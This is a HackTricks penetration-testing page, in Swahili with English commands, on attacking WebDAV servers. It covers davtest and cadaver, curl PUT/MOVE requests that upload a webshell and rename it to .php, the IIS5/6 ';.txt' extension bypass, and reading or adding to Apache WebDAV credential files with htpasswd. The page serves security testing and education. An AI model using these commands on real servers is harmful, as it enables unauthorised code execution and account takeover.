WebDav
Reading time: 4 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Unaposhughulika na HTTP Server yenye WebDav iliyoanzishwa, inawezekana kudhibiti faili ikiwa una vithibitisho sahihi, ambavyo kawaida vinathibitishwa kupitia HTTP Basic Authentication. Kupata udhibiti wa seva kama hiyo mara nyingi kunahusisha kupakia na kutekeleza webshell.
Upatikanaji wa seva ya WebDav kawaida unahitaji vithibitisho halali, huku WebDav bruteforce ikiwa njia ya kawaida ya kuzipata.
Ili kushinda vizuizi kwenye upakiaji wa faili, hasa vile vinavyokataza utekelezaji wa skripti za upande wa seva, unaweza:
- Kupakia faili zenye nyongeza zinazoweza kutekelezwa moja kwa moja ikiwa hazijakatazwa.
- Kubadilisha jina la faili zisizoweza kutekelezwa zilizopakiwa (kama .txt) kuwa nyongeza inayoweza kutekelezwa.
- Kopi faili zisizoweza kutekelezwa zilizopakiwa, ukibadilisha nyongeza yao kuwa ile inayoweza kutekelezwa.
DavTest
Davtest inajaribu kupakia faili kadhaa zenye nyongeza tofauti na kuangalia ikiwa nyongeza hiyo inatekelezwa:
davtest [-auth user:password] -move -sendbd auto -url http://<IP> #Uplaod .txt files and try to move it to other extensions
davtest [-auth user:password] -sendbd auto -url http://<IP> #Try to upload every extension
Hii haimaanishi kwamba .txt na .html extensions zinafanywa. Hii inamaanisha kwamba unaweza kufikia hizi faili kupitia mtandao.
Cadaver
Unaweza kutumia chombo hiki kuungana na WebDav server na kufanya vitendo (kama kupakia, kuhamasisha au kufuta) kwa mikono.
cadaver <IP>
PUT ombi
curl -T 'shell.txt' 'http://$ip'
MOVE ombi
curl -X MOVE --header 'Destination:http://$ip/shell.php' 'http://$ip/shell.txt'
IIS5/6 WebDav Vulnerability
Ushirikiano huu ni wa kuvutia sana. WebDav ha iruhusu kupakia au kurekebisha faili zenye kiambishi .asp. Lakini unaweza kuepuka hii kwa kuongeza mwishoni mwa jina ";.txt" na faili itatekelezwa kana kwamba ni faili ya .asp (unaweza pia kutumia ".html" badala ya ".txt" lakini USISAHAU ";").
Kisha unaweza kupakia shell yako kama faili ya ".txt" na kunakili/kuhamasisha kwenye faili ya ".asp;.txt". Ukifungua faili hiyo kupitia seva ya wavuti, itatekelezwa (cadaver itasema kwamba hatua ya kuhamasisha haikufanya kazi, lakini ilifanya).
Post credentials
Ikiwa Webdav ilikuwa ikitumia seva ya Apache unapaswa kuangalia tovuti zilizowekwa kwenye Apache. Kawaida:
_/etc/apache2/sites-enabled/000-default_
Ndani yake unaweza kupata kitu kama:
ServerAdmin webmaster@localhost
Alias /webdav /var/www/webdav
<Directory /var/www/webdav>
DAV On
AuthType Digest
AuthName "webdav"
AuthUserFile /etc/apache2/users.password
Require valid-user
Kama unavyoona kuna faili zenye credentials halali za seva ya webdav:
/etc/apache2/users.password
Ndani ya aina hii ya faili utaona jina la mtumiaji na hash ya nenosiri. Hizi ndizo sifa zinazotumiwa na seva ya webdav kuthibitisha watumiaji.
Unaweza kujaribu kufungua hizo, au kuongeza zaidi ikiwa kwa sababu fulani unataka kufikia seva ya webdav:
htpasswd /etc/apache2/users.password <USERNAME> #You will be prompted for the password
Ili kuangalia kama akiba mpya inafanya kazi unaweza kufanya:
wget --user <USERNAME> --ask-password http://domain/path/to/webdav/ -O - -q
Marejeo
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.